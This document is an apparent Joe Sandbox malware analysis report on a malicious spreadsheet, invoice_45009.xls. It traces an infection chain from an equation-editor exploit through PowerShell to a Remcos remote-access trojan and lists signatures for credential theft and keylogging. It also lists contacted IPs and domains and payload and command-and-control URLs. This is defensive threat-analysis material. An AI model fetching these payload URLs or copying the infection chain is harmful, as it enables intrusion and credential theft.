Microsoft Office drops suspicious files 18->130 25 EQNEDT32.EXE 12 18->25         started        file9 signatures10 process11 file12 98 Suspicious powershell command line found 22->98 100 Obfuscated command line found 22->100 102 Suspicious execution chain found 22->102 28 powershell.exe 12 5 22->28         started        54 C:\Users\...\newsweetnesswithverynicecute.vbS, Unicode 25->54 dropped 104 Office equation editor establishes network connection 25->104 106 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 25->106 signatures13 process14 dnsIp15 72 raw.githubusercontent.com 185.199.111.133, 443, 49174 FASTLYUS Netherlands 28->72 116 Writes to foreign memory regions 28->116 118 Injects a PE file into a foreign processes 28->118 32 RegAsm.exe 3 13 28->32         started        37 RegAsm.exe 28->37         started        signatures16 process17 dnsIp18 58 ugnrv.duckdns.org 32->58 60 ugnrv.duckdns.org 192.3.101.184, 49177, 49178, 9674 AS-COLOCROSSINGUS United States 32->60 62 geoplugin.net 178.237.33.50, 49179, 80 ATOM86-ASATOM86NL Netherlands 32->62 46 C:\ProgramData\remcos\logs.dat, data 32->46 dropped 74 Detected Remcos RAT 32->74 76 Maps a DLL or memory area into another process 32->76 78 Installs a global keyboard hook 32->78 39 RegAsm.exe 1 32->39         started        42 RegAsm.exe 32->42         started        44 RegAsm.exe 11 32->44         started        80 Contains functionality to bypass UAC (CMSTPLUA) 37->80 82 Tries to steal Mail credentials (via file registry) 37->82 84 Contains functionalty to change the wallpaper 37->84 88 5 other signatures 37->88 file19 86 Uses dynamic DNS services 58->86 signatures20 process21 signatures22 108 Tries to steal Instant Messenger accounts or passwords 39->108 110 Tries to steal Mail credentials (via file / registry access) 39->110 112 Searches for Windows Mail specific files 39->112 114 Tries to harvest and steal browser information (history, passwords, etc) 42->114

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    invoice_45009.xls13%ReversingLabsDocument-PDF.Trojan.Heuristic
                    invoice_45009.xls100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{93BF753C-FD01-4E16-B48B-F8FB75D6D297}.tmp100%AviraEXP/CVE-2017-11882.Gen
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://www.imvu.comr0%URL Reputationsafe
                    http://ocsp.entrust.net030%URL Reputationsafe
                    https://contoso.com/License0%URL Reputationsafe
                    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                    https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
                    http://go.micros0%URL Reputationsafe
                    http://geoplugin.net/json.gp/C0%URL Reputationsafe
                    https://contoso.com/0%URL Reputationsafe
                    https://nuget.org/nuget.exe0%URL Reputationsafe
                    https://login.yahoo.com/config/login0%URL Reputationsafe
                    http://ocsp.entrust.net0D0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://nuget.org/NuGet.exe0%URL Reputationsafe
                    http://crl.entrust.net/server1.crl00%URL Reputationsafe
                    http://www.imvu.com0%URL Reputationsafe
                    https://contoso.com/Icon0%URL Reputationsafe
                    http://geoplugin.net/json.gp0%URL Reputationsafe
                    https://secure.comodo.com/CPS00%URL Reputationsafe
                    http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                    http://www.ebuddy.com0%URL Reputationsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    ugnrv.duckdns.org
                    192.3.101.184
                    truetrue
                      unknown
                      m2g.me
                      14.194.50.211
                      truetrue
                        unknown
                        raw.githubusercontent.com
                        185.199.111.133
                        truefalse
                          unknown
                          geoplugin.net
                          178.237.33.50
                          truefalse
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            ugnrv.duckdns.orgtrue
                              unknown
                              http://38.240.44.9/450/newsweetnesswithverynicecute.Tiftrue
                                unknown
                                http://38.240.44.9/450/hun/nicesweetthingsentiretimesheneedtogetmebackwithverynicepersonwhowillingtogetniceworthfulthingsalwaysinhandsweetnesshaveforthebiscoutwhichieatedwith____veryniceenitertime.doctrue
                                  unknown
                                  https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtfalse
                                    unknown
                                    http://geoplugin.net/json.gpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://m2g.me/d1a1false
                                      unknown
                                      http://38.240.44.9/450/RDSSSER.txttrue
                                        unknown
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://b.scorecardresearch.com/beacon.jsbhvE936.tmp.20.drfalse
                                          unknown
                                          https://m2g.me/m2g.me.url.4.drfalse
                                            unknown
                                            http://acdn.adnxs.com/ast/ast.jsbhvE936.tmp.20.drfalse
                                              unknown
                                              http://www.imvu.comrRegAsm.exe, 00000016.00000002.493002078.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_bhvE936.tmp.20.drfalse
                                                unknown
                                                https://m2g.me/d1a1yX33930000.0.dr, ~DFC909180303CC471C.TMP.0.drfalse
                                                  unknown
                                                  http://ocsp.entrust.net03powershell.exe, 00000010.00000002.489646290.0000000004EC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1bhvE936.tmp.20.drfalse
                                                    unknown
                                                    https://contoso.com/Licensepowershell.exe, 00000010.00000002.487113772.0000000003439000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://support.google.com/chrome/?p=plugin_flashRegAsm.exe, 00000014.00000002.496507955.00000000025B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.pngbhvE936.tmp.20.drfalse
                                                        unknown
                                                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000010.00000002.489646290.0000000004EC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000010.00000002.489646290.0000000004EC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9bhvE936.tmp.20.drfalse
                                                            unknown
                                                            http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.htmlbhvE936.tmp.20.drfalse
                                                              unknown
                                                              http://www.nirsoft.netRegAsm.exe, 00000014.00000002.496088283.00000000002DF000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://deff.nelreports.net/api/report?cat=msnbhvE936.tmp.20.drfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jsbhvE936.tmp.20.drfalse
                                                                  unknown
                                                                  http://go.microspowershell.exe, 00000010.00000002.486492104.000000000292E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comRegAsm.exe, 00000016.00000002.493002078.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://cache.btrll.com/default/Pix-1x1.gifbhvE936.tmp.20.drfalse
                                                                      unknown
                                                                      http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683bhvE936.tmp.20.drfalse
                                                                        unknown
                                                                        https://www.google.comRegAsm.exe, RegAsm.exe, 00000016.00000002.493002078.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                          unknown
                                                                          http://geoplugin.net/json.gp/Cpowershell.exe, 00000010.00000002.487113772.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000003439000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://o.aolcdn.com/ads/adswrappermsni.jsbhvE936.tmp.20.drfalse
                                                                            unknown
                                                                            http://cdn.taboola.com/libtrc/msn-home-network/loader.jsbhvE936.tmp.20.drfalse
                                                                              unknown
                                                                              http://www.msn.com/?ocid=iehpbhvE936.tmp.20.drfalse
                                                                                unknown
                                                                                https://contoso.com/powershell.exe, 00000010.00000002.487113772.0000000003439000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://nuget.org/nuget.exepowershell.exe, 00000010.00000002.487113772.0000000003439000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033bhvE936.tmp.20.drfalse
                                                                                  unknown
                                                                                  http://static.chartbeat.com/js/chartbeat.jsbhvE936.tmp.20.drfalse
                                                                                    unknown
                                                                                    http://www.msn.com/de-de/?ocid=iehpbhvE936.tmp.20.drfalse
                                                                                      unknown
                                                                                      http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%bhvE936.tmp.20.drfalse
                                                                                        unknown
                                                                                        https://login.yahoo.com/config/loginRegAsm.exefalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://www.nirsoft.net/RegAsm.exe, 00000016.00000002.493002078.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          http://ocsp.entrust.net0Dpowershell.exe, 00000010.00000002.489646290.0000000004EC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000D.00000002.492245268.000000000248C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.486492104.0000000002411000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3bhvE936.tmp.20.drfalse
                                                                                            unknown
                                                                                            http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683bhvE936.tmp.20.drfalse
                                                                                              unknown
                                                                                              http://38.240.44.9/450/newsweetnesswithverynicecute.TifjEQNEDT32.EXE, 0000000B.00000002.462980650.000000000057F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(bhvE936.tmp.20.drfalse
                                                                                                  unknown
                                                                                                  https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9bhvE936.tmp.20.drfalse
                                                                                                    unknown
                                                                                                    http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_shbhvE936.tmp.20.drfalse
                                                                                                      unknown
                                                                                                      http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.jsbhvE936.tmp.20.drfalse
                                                                                                        unknown
                                                                                                        http://nuget.org/NuGet.exepowershell.exe, 00000010.00000002.487113772.0000000003439000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://geoplugin.net/json.gpaRegAsm.exe, 00000013.00000002.642581330.0000000000B75000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://www.ccleaner.com/go/app_cc_pro_trialkeybhvE936.tmp.20.drfalse
                                                                                                            unknown
                                                                                                            http://crl.entrust.net/server1.crl0powershell.exe, 00000010.00000002.489646290.0000000004EC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            https://contextual.media.net/8/nrrV73987.jsbhvE936.tmp.20.drfalse
                                                                                                              unknown
                                                                                                              http://www.imvu.comRegAsm.exe, RegAsm.exe, 00000016.00000002.493220079.0000000000459000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000016.00000002.493002078.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              https://contoso.com/Iconpowershell.exe, 00000010.00000002.487113772.0000000003439000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://38.240.44.9powershell.exe, 00000010.00000002.486492104.00000000026B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                http://geoplugin.net/json.gpwRegAsm.exe, 00000013.00000002.642581330.0000000000B75000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://contextual.media.net/bhvE936.tmp.20.drfalse
                                                                                                                    unknown
                                                                                                                    http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.jsbhvE936.tmp.20.drfalse
                                                                                                                      unknown
                                                                                                                      https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2bhvE936.tmp.20.drfalse
                                                                                                                        unknown
                                                                                                                        http://www.imvu.com/sKRegAsm.exe, 00000016.00000002.492857481.000000000026C000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          http://www.msn.com/bhvE936.tmp.20.drfalse
                                                                                                                            unknown
                                                                                                                            https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhvE936.tmp.20.drfalse
                                                                                                                              unknown
                                                                                                                              http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 00000010.00000002.489646290.0000000004EC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549bhvE936.tmp.20.drfalse
                                                                                                                                  unknown
                                                                                                                                  https://raw.githubusercontent.compowershell.exe, 00000010.00000002.486492104.000000000254A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    http://cdn.at.atwola.com/_media/uac/msn.htmlbhvE936.tmp.20.drfalse
                                                                                                                                      unknown
                                                                                                                                      https://www.google.com/accounts/serviceloginRegAsm.exefalse
                                                                                                                                        unknown
                                                                                                                                        http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2FsetbhvE936.tmp.20.drfalse
                                                                                                                                          unknown
                                                                                                                                          https://secure.comodo.com/CPS0powershell.exe, 00000010.00000002.489646290.0000000004EC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://policies.yahoo.com/w3c/p3p.xmlbhvE936.tmp.20.drfalse
                                                                                                                                            unknown
                                                                                                                                            http://crl.entrust.net/2048ca.crl0powershell.exe, 00000010.00000002.489646290.0000000004EC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            http://www.msn.com/advertisement.ad.jsbhvE936.tmp.20.drfalse
                                                                                                                                              unknown
                                                                                                                                              http://www.ebuddy.comRegAsm.exe, RegAsm.exe, 00000016.00000002.493002078.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              • No. of IPs < 25%
                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                              • 75% < No. of IPs
                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                              38.240.44.9
                                                                                                                                              unknownUnited States
                                                                                                                                              174COGENT-174UStrue
                                                                                                                                              14.194.50.211
                                                                                                                                              m2g.meIndia
                                                                                                                                              55441TTSLMEIS-AS-APTTSL-ISPDIVISIONINtrue
                                                                                                                                              192.3.101.184
                                                                                                                                              ugnrv.duckdns.orgUnited States
                                                                                                                                              36352AS-COLOCROSSINGUStrue
                                                                                                                                              178.237.33.50
                                                                                                                                              geoplugin.netNetherlands
                                                                                                                                              8455ATOM86-ASATOM86NLfalse
                                                                                                                                              185.199.111.133
                                                                                                                                              raw.githubusercontent.comNetherlands
                                                                                                                                              54113FASTLYUSfalse
                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                              Analysis ID:1528050
                                                                                                                                              Start date and time:2024-10-07 14:51:15 +02:00
                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                              Overall analysis duration:0h 8m 34s
                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                              Report type:full
                                                                                                                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                              Number of analysed new started processes analysed:24
                                                                                                                                              Number of new started drivers analysed:1
                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                              Technologies:
                                                                                                                                              • HCA enabled
                                                                                                                                              • EGA enabled
                                                                                                                                              • GSI enabled (VBA)
                                                                                                                                              • AMSI enabled
                                                                                                                                              Analysis Mode:default
                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                              Sample name:invoice_45009.xls
                                                                                                                                              Detection:MAL
                                                                                                                                              Classification:mal100.rans.phis.troj.spyw.expl.evad.winXLS@19/37@17/5
                                                                                                                                              EGA Information:
                                                                                                                                              • Successful, ratio: 71.4%
                                                                                                                                              HCA Information:
                                                                                                                                              • Successful, ratio: 99%
                                                                                                                                              • Number of executed functions: 184
                                                                                                                                              • Number of non-executed functions: 319
                                                                                                                                              Cookbook Comments:
                                                                                                                                              • Found application associated with file extension: .xls
                                                                                                                                              • Changed system and user locale, location and keyboard layout to French - France
                                                                                                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                              • Attach to Office via COM
                                                                                                                                              • Active ActiveX Object
                                                                                                                                              • Active ActiveX Object
                                                                                                                                              • Scroll down
                                                                                                                                              • Close Viewer
                                                                                                                                              • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                                                                                              • Execution Graph export aborted for target EQNEDT32.EXE, PID 3976 because there are no executed function
                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 3120 because it is empty
                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                              • VT rate limit hit for: invoice_45009.xls
                                                                                                                                              TimeTypeDescription
                                                                                                                                              08:53:02API Interceptor62x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                              08:53:05API Interceptor121x Sleep call for process: powershell.exe modified
                                                                                                                                              08:53:05API Interceptor24x Sleep call for process: wscript.exe modified
                                                                                                                                              08:53:16API Interceptor363966x Sleep call for process: RegAsm.exe modified
                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                              14.194.50.211PO.78NO9.xlsGet hashmaliciousFormBookBrowse
                                                                                                                                                178.237.33.50HkeU5FHEO1.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                Quotation request YN2024-10-07pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                17282393454a20ebb72846132bb7146ed4a1a58abc0a2fcca78c88bb5a73356856494e7ece637.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                1728239644b6c097b50f50c5ed70baa52a8cacbfdc1e82b38c0aa5c471e1a07dbef595bc59540.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                MKWbWHd5Ni.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                185.199.111.133http://uppholldbcloginn.gitbook.io/us/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  OTO2wVGgkl.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                      na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                        na.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                                                                                          http://mr-zkpak47.github.io/Netflix_Front_PageGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                            http://sachinchaunal.github.io/Netflix-Clone-Old-VersionGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              na.rtfGet hashmaliciousUnknownBrowse
                                                                                                                                                                http://ravichandra1816.github.io/Netflix-cloneGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                  MKWbWHd5Ni.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                    ugnrv.duckdns.orgSecuriteInfo.com.Exploit.CVE-2017-11882.123.22323.26667.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 192.3.101.254
                                                                                                                                                                    17261710865859b5a4fbe59d9fe7633c58ddbfcf673aced5c1e11544a7b094de3c06aa9e30185.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 192.3.101.254
                                                                                                                                                                    INV_00983.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 192.3.101.254
                                                                                                                                                                    SecuriteInfo.com.Exploit.CVE-2017-11882.123.15030.28858.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 192.3.101.254
                                                                                                                                                                    Inquiry_0476452.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 192.3.101.254
                                                                                                                                                                    raw.githubusercontent.comPAYMENT SPECIFIKACIJA 364846637-pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                    OTO2wVGgkl.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 185.199.111.133
                                                                                                                                                                    k4STQvJ6rV.vbsGet hashmaliciousXWormBrowse
                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                    Request For Quotation.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                    PO.78NO9.xlsGet hashmaliciousFormBookBrowse
                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                    Company Profile.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                    ls6sm8RNqn.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 185.199.109.133
                                                                                                                                                                    na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 185.199.109.133
                                                                                                                                                                    na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 185.199.109.133
                                                                                                                                                                    na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 185.199.111.133
                                                                                                                                                                    m2g.mePO.78NO9.xlsGet hashmaliciousFormBookBrowse
                                                                                                                                                                    • 14.194.50.211
                                                                                                                                                                    geoplugin.netHkeU5FHEO1.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                    Quotation request YN2024-10-07pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                    17282393454a20ebb72846132bb7146ed4a1a58abc0a2fcca78c88bb5a73356856494e7ece637.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                    na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                    na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                    1728239644b6c097b50f50c5ed70baa52a8cacbfdc1e82b38c0aa5c471e1a07dbef595bc59540.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                    na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                    na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                    na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                    MKWbWHd5Ni.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                    AS-COLOCROSSINGUSls6sm8RNqn.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 107.175.130.20
                                                                                                                                                                    na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 107.172.130.147
                                                                                                                                                                    na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 192.210.150.29
                                                                                                                                                                    na.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                                                                                                    • 107.172.130.147
                                                                                                                                                                    na.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                                                                                                                    • 172.245.123.6
                                                                                                                                                                    na.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                                                                                                    • 107.172.148.201
                                                                                                                                                                    na.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                                                                                                                    • 172.245.123.9
                                                                                                                                                                    na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                    • 107.175.125.190
                                                                                                                                                                    na.rtfGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 107.172.148.201
                                                                                                                                                                    na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 192.3.165.37
                                                                                                                                                                    COGENT-174USxd.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                    • 38.50.28.156
                                                                                                                                                                    z1SupplyInvoiceCM60916_Doc.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                    • 38.55.251.233
                                                                                                                                                                    SOA SIL TL382920.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                    • 38.55.251.233
                                                                                                                                                                    Arrival notice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                    • 38.47.233.65
                                                                                                                                                                    PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                    • 38.47.232.144
                                                                                                                                                                    http://tiktok1api.goodpay.buzz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                    • 154.39.150.40
                                                                                                                                                                    http://emaildlatt-mailcom-28e2uy93.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 38.91.45.7
                                                                                                                                                                    2qWIvXORVU.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                    • 38.43.41.200
                                                                                                                                                                    na.elfGet hashmaliciousSliverBrowse
                                                                                                                                                                    • 38.55.193.31
                                                                                                                                                                    na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                    • 38.51.219.197
                                                                                                                                                                    ATOM86-ASATOM86NLHkeU5FHEO1.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                    Quotation request YN2024-10-07pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                    17282393454a20ebb72846132bb7146ed4a1a58abc0a2fcca78c88bb5a73356856494e7ece637.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                    na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                    na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                    • 178.237.33.50
